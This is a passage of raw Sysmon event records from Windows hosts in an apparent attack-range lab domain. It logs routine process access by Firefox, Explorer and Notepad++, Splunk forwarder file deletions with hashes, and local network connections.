Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000106033Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.245{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106032Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.245{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106031Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.244{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106030Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.244{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106029Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.243{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106058Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:48.555{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000106057Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:48.389{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 23542300x8000000000000000106056Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:48.329{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0905BD9A48D0C1003655912F4CDCA8,SHA256=D63949C77EF994A960F3242AD40AAB60E7875B95628D2518A78555308E29863F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082899Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:48.203{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=740FB8BB9DED4FCADE17078DC74E2AAC,SHA256=C43ADF50FCCF82F7861A802C9F1684ED06BA60D75D2325C771DDA4A1A557499F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082898Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:45.663{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50125-false10.0.1.12-8000- 10341000x8000000000000000106055Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:48.272{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e5b4a7|C:\Program Files\Mozilla Firefox\xul.dll+8bf380|C:\Program Files\Mozilla Firefox\xul.dll+8b39ad|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106054Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:48.271{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e5b4a7|C:\Program Files\Mozilla Firefox\xul.dll+8bf380|C:\Program Files\Mozilla Firefox\xul.dll+8b39ad|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106053Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:48.270{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000106052Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:48.270{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000106051Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:48.266{58E9C193-AE68-615A-C800-00000000FC01}45484800C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106050Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:48.031{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\5000MD5=8C671F69DC26C86DC8AD16EA31EE8F27,SHA256=A85ADC9748726BCF60D898EFEEE57B8A8AE6A2E3CD65DCCF1AC08EFED736A195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106059Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:49.333{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4488AB3D9C7F298FE8D96EA7E272B26,SHA256=FC4854FC12C50B73B0A886E5B72B4F7DB05DCE2A76A371761CE9578F1CF1C9ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082900Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:49.203{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE3F0609D6F352E2DAE9BCBD22C6A87C,SHA256=1175C6E817AB4E5C5141FC7EE2FE84524BC4AD8BFA9540D1E4931B4782C31EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082901Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:50.422{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=977BBA8239F28822FD86DBCC5AE2D363,SHA256=1FAFCEDBAE3A44D8F0740911CB5FEB7A517FB7FF2CF0021D6F1FF592126AF2B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106067Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:50.387{58E9C193-AE68-615A-C800-00000000FC01}45484800C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106066Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:50.386{58E9C193-AE68-615A-C800-00000000FC01}45484800C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106065Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:50.386{58E9C193-AE68-615A-C800-00000000FC01}45484800C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106064Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:50.357{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106063Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:50.357{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106062Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:50.356{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106061Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:50.356{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106060Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:50.340{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50A5959262EAD1AE7CFFEED4203E4366,SHA256=DDA6A0444599BCF113594461C4CA1B1FD5680AB3FBE9CDA83BF91B0EF228FC55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082902Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:51.453{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E94F06CC0520508667FD0A472A839FB7,SHA256=3DBB2B57C991CEDC2CF2AA7A1D3F7AD01F9F1E7FC74F93B25BB89FFB75ACC091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106069Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:51.384{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53D482CA4CFD6E94E51C696F7D23ED77,SHA256=01D62AF686F63E10062A5D89446DB79EEF71EC27866D1F2620FB5E3C27437425,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106068Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:49.341{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51824-false10.0.1.12-8000- 23542300x800000000000000082903Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:52.469{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEDFDE7BFF77878C2400D647C3D68F60,SHA256=B2BAAB44F1EBC53FD43750B433291AA53A100A24B88C3BD741ABBF251A56241B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106070Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:52.388{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 